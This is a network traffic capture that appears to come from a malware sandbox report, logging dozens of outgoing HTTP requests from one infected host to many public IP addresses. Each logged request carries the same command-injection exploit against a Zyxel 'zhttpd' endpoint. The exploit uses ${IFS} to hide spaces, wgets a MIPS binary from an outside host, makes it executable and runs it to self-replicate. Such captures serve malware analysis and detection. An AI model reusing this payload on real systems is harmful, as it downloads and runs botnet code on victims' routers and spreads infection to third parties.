                                                  Jan 19, 2024 18:24:09.327105999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7664192.168.2.1335320138.28.74.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327157021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7665192.168.2.135879474.35.58.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327202082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7666192.168.2.135342692.40.166.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327243090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7667192.168.2.1332774151.24.144.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327265978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7668192.168.2.1349260221.186.21.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327310085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7669192.168.2.133582651.196.112.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327344894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7670192.168.2.135261652.89.85.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327383995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7671192.168.2.134716040.175.218.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327421904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7672192.168.2.135415497.127.183.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327455044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7673192.168.2.1337190176.102.125.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327500105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7674192.168.2.1351032208.228.174.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327550888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7675192.168.2.1335012200.240.124.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327584028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7676192.168.2.1341618206.73.40.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327631950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7677192.168.2.136008860.210.164.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327665091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7678192.168.2.1340600130.235.107.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327718019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7679192.168.2.133519091.12.80.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327749014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7680192.168.2.1334492162.241.46.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327831030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7681192.168.2.1336944111.113.195.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327867985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7682192.168.2.133481881.129.171.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327902079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7683192.168.2.1341704102.165.77.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327950001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7684192.168.2.1342058178.29.172.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327984095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7685192.168.2.1349182134.59.238.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328015089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7686192.168.2.1342984106.182.126.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328042030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7687192.168.2.1333194183.131.130.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328092098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7688192.168.2.1353390154.122.49.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328141928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7689192.168.2.135145672.230.117.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328186035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7690192.168.2.1353610188.124.207.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328208923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7691192.168.2.1359942140.111.40.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328265905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7692192.168.2.1341994207.209.220.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328290939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7693192.168.2.1348276110.138.76.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328345060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7694192.168.2.1348440100.239.53.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328392029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7695192.168.2.1347152182.183.236.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328423977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7696192.168.2.133826625.194.105.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328452110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7697192.168.2.1354032193.255.21.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328511953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7698192.168.2.135618254.20.47.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328556061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7699192.168.2.1359330181.56.230.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328596115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7700192.168.2.135531692.0.122.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328646898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7701192.168.2.1335788119.29.26.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328695059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7702192.168.2.1334536161.83.169.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328723907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7703192.168.2.1353946219.254.74.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328773975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7704192.168.2.1345348138.186.149.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328818083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7705192.168.2.1359044188.160.144.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328849077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7706192.168.2.1343152160.246.178.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328915119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7707192.168.2.1340458148.52.36.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328941107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7708192.168.2.133988245.171.52.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.328974009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7709192.168.2.134999037.106.33.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329030037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7710192.168.2.134450450.227.139.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329090118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7711192.168.2.133320694.210.247.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329121113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7712192.168.2.133439464.70.211.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329154015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7713192.168.2.1334922175.11.242.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329199076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7714192.168.2.1354672219.42.245.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329224110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7715192.168.2.1351620137.211.107.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329293966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7716192.168.2.1354812137.230.179.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329325914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7717192.168.2.1347406111.198.189.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329365969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7718192.168.2.1355196151.68.203.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329406977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7719192.168.2.133719834.107.223.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329446077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7720192.168.2.133508253.139.244.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329480886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7721192.168.2.1345112177.204.10.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329533100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7722192.168.2.135891825.46.231.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329580069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7723192.168.2.133430457.128.66.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329627991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7724192.168.2.1351632204.232.186.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329653978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7725192.168.2.135800457.1.229.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329684973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7726192.168.2.1347690117.60.69.156443
                                                  TimestampBytes transferredDirectionData
